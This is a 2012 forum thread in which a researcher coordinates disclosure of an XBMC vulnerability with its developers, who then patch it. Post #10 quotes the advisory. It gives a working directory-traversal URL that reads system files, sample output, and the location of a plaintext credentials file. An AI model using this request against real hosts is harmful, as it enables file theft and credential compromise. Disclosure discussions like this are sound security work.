Security issues in XBMC

  Thread Rating:
  • 0 Votes - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Post Reply
acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #1
Got several high risk security issues in XBMC, would like to come in contact with a main developer or someone in charge of XBMC security.

Thanks

Best Regards
Lucas
find quote
Martijn Offline
Team Kodi
Posts: 11,235
Joined: Jul 2011
Reputation: 162
Location: Dawn of time
Post: #2
just post what you found so they can look at it

Always read the XBMC online-manual, FAQ and search the forums before posting.
Do NOT e-mail Team-XBMC members asking for support. Read/follow the forum rules.
For troubleshooting and bug reporting, make sure you read this first

For your mediacenter artwork go to
[Image: fanarttv.png]
find quote
acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #3
(2012-10-31 21:58)Martijn Wrote:  just post what you found so they can look at it

By posting what I found I'd expose thousands of users running XBMC, perhaps 3'rd party to such as openelec etc....

Are you sure that is what you want?

Br,
Lucas
find quote
davilla Offline
Retired-Team-XBMC Developer
Posts: 11,478
Joined: Feb 2008
Reputation: 64
Post: #4
any xbmc users that has xbmc directly exposed on the net is a fool Smile


MediaInfo : http://mediainfo.sourceforge.net/
Do not e-mail XBMC-Team members directly asking for support. Read/follow the forum rules.
find quote
acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #5
(2012-10-31 22:01)davilla Wrote:  any xbmc users that has xbmc directly exposed on the net is a fool Smile

Alright... that's .. professionally said....

I'll coordinate a disclosure with the firm I work for, and post the vulnerabilities I have.
Usually takes about a day, since most vendors wan't to keep it under the lid until they have a patch.

Do you wan't them here, or in the bug tracker?

Best regards
Lucas
find quote
theuni Offline
Team-XBMC Communication Manager
Posts: 1,105
Joined: Oct 2007
Reputation: 2
Location: Atlanta, Ga, USA
Post: #6
Any vulnerability will be fixed with a public commit.

We are nearing the beta stage for Frodo, so likely anything (major) you disclose now will be addressed before public release.

If they date back to Eden and are serious enough to warrant a point-release, that would be worth knowing ahead of time. But as davilla said, it would not be wise to expose xbmc publicly.. so i'm not sure what "serious enough" would be.
find quote
acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #7
(2012-10-31 22:14)theuni Wrote:  Any vulnerability will be fixed with a public commit.

We are nearing the beta stage for Frodo, so likely anything (major) you disclose now will be addressed before public release.

If they date back to Eden and are serious enough to warrant a point-release, that would be worth knowing ahead of time. But as davilla said, it would not be wise to expose xbmc publicly.. so i'm not sure what "serious enough" would be.

True story, not here to argue, your call.
There's a lot of things that shouldn't be exposed, that are exposed.

And yes this dates back and effects Eden as well.
I'll post it tomorrow.

Best regards
Lucas
find quote
acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #8
Seems like this is going to take a couple of extra days, documents etc need to go through review for the coordinated disclosure.
Thanks for baring with me.

Best regards
Lucas
find quote
jmarshall Offline
Team-XBMC Developer
Posts: 26,228
Joined: Oct 2003
Reputation: 177
Post: #9
Quote:Thanks for baring with me.

I guess I can see how a security issue might be likened to being naked...

Always read the XBMC online-manual, FAQ and search the forum before posting.
Do not e-mail XBMC-Team members directly asking for support. Read/follow the forum rules.
For troubleshooting and bug reporting please make sure you read this first.


[Image: badge.gif]
find quote
acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #10
You can find the full disclosure at http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf
Below is a summary of the File Traversal vulnerability, which allows an attacker to read any file on the system, with the same privileges as the XBMC process.
Since XBMC stores usernames and password in clear text, an attacker might be able to gain further access to the targeted machine with the found credentials.

File traversal vulnerability can be triggered with (Windows request) : http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini


---SNIP---
XBMC File traversal vulnerability

Severity: High

Affected:
XBMC 11 => Nightly build 20121028 Windows version
XBMCbuntu / XBMC 11 for Linux
XBMC 11 11.0 for Respberry Pi
XBMC 11.0 Git:20120702-f3cd288 for Jailbroken AppleTV 2 version (Thanks to Matt "hostess" Andreko for the verification.)

Impact
Remote File traversal allows an attacker to read any file on the targeted system with the same privileges as XBMC.
Since XBMC stores SMB and other credentials in clear text on the computer running the service, an attacker could easily find
valid network credentials to gain further access. This could lead to full system compromise, or compromise other systems XBMC
has access to.

Request (Windows):
http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
Output:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]Confidential. Proprietary. [5]
MAPI=1
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo
asx=MPEGVideo
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wmx=MPEGVideo
wpl=MPEGVideo
wvx=MPEGVideo

XBMC Password file (which is unencrypted): /private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml
<passwords>
<path>
<from pathversion="1">smb://192.168.1.2/Movies</from>
<to pathversion="1">smb://someuser:somepass@192.168.1.2/Movies/</to>
</path>
<path>
<from pathversion="1">smb://192.168.1.2/tv</from>
<to pathversion="1">smb://someuser2:somepasspass2@192.168.1.2/tv/</to>
</path>
<path>
<from pathversion="1">smb://192.168.1.2/Music</from>Confidential. Proprietary. [4]
<to pathversion="1">smb://someuser3:somepass3@192.168.1.2/Music/</to>
</path>
</passwords>
---SNIP---

Best regards
Lucas
find quote
Tolriq Offline
Donor
Posts: 2,317
Joined: Jun 2009
Reputation: 68
Location: France
Post: #11
This was known for a very very long time Smile

And is corrected in lasts Frodo nightly with added security on vfs handler.

When I first reported this the official answer was don't put your Xbmc on Internet it's not secure Smile

Check : http://forum.xbmc.org/showthread.php?tid=81173

Yatse 2 : Media Center Remote Control for Touch Screens
Yatse, the Xbmc Remote and Widgets for Android
find quote
Montellese Offline
Team-XBMC Developer
Posts: 3,682
Joined: Jan 2009
Reputation: 34
Location: Switzerland
Post: #12
It's the same vulnerability but in a different spot. I'll look into it.

Always read the XBMC online-manual, FAQ and search the forum before posting.
Do not e-mail XBMC-Team members directly asking for support. Read/follow the forum rules.
For troubleshooting and bug reporting please make sure you read this first.

[Image: badge.gif]
find quote
Montellese Offline
Team-XBMC Developer
Posts: 3,682
Joined: Jan 2009
Reputation: 34
Location: Switzerland
Post: #13
Should be fixed with https://github.com/xbmc/xbmc/commit/bdff...ab52a65335. See how easy it is if you just post your findings here? Wink

PS: You mentioned "serveral high security risks" in your initial post. Was this the only one or are there others you don't (want to?) share with us?

Always read the XBMC online-manual, FAQ and search the forum before posting.
Do not e-mail XBMC-Team members directly asking for support. Read/follow the forum rules.
For troubleshooting and bug reporting please make sure you read this first.

[Image: badge.gif]
(This post was last modified: 2012-11-04 15:23 by Montellese.)
find quote
amet Offline
Retired Team-Kodi Member
Posts: 4,113
Joined: Jul 2009
Reputation: 41
Location: Novi Sad / Dubai
Post: #14
But then there would be no official document and no drama

Always read the XBMC_Online_Manual,Frequently_Asked_Questions and search the forum before posting.
For troubleshooting and bug reporting use -> Log_file.
find quote
acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #15
(2012-11-04 13:56)Tolriq Wrote:  This was known for a very very long time Smile

And is corrected in lasts Frodo nightly with added security on vfs handler.

When I first reported this the official answer was don't put your Xbmc on Internet it's not secure Smile

Check : http://forum.xbmc.org/showthread.php?tid=81173

The nightly was still vulnerable last time i checked.
And if it has been known for a while, perhaps it's time to fix it?

Best regards
Lucas

(2012-11-04 15:45)amet Wrote:  But then there would be no official document and no drama

You can also say, no official document, nothing gets done.

Best regards
Lucas
(2012-11-04 15:21)Montellese Wrote:  Should be fixed with https://github.com/xbmc/xbmc/commit/bdff...ab52a65335. See how easy it is if you just post your findings here? Wink

PS: You mentioned "serveral high security risks" in your initial post. Was this the only one or are there others you don't (want to?) share with us?

Nice, way faster then most Smile

Yeah Currently investigation if it's exploitable or not. At least a DoS. If it's just a DoS I'll post it in the bug forums.
There's two possible issues that are in the 'works'.

You'll know when i know.

Best regards
Lucas
(This post was last modified: 2012-11-04 16:57 by acidgen.)
find quote
Post Reply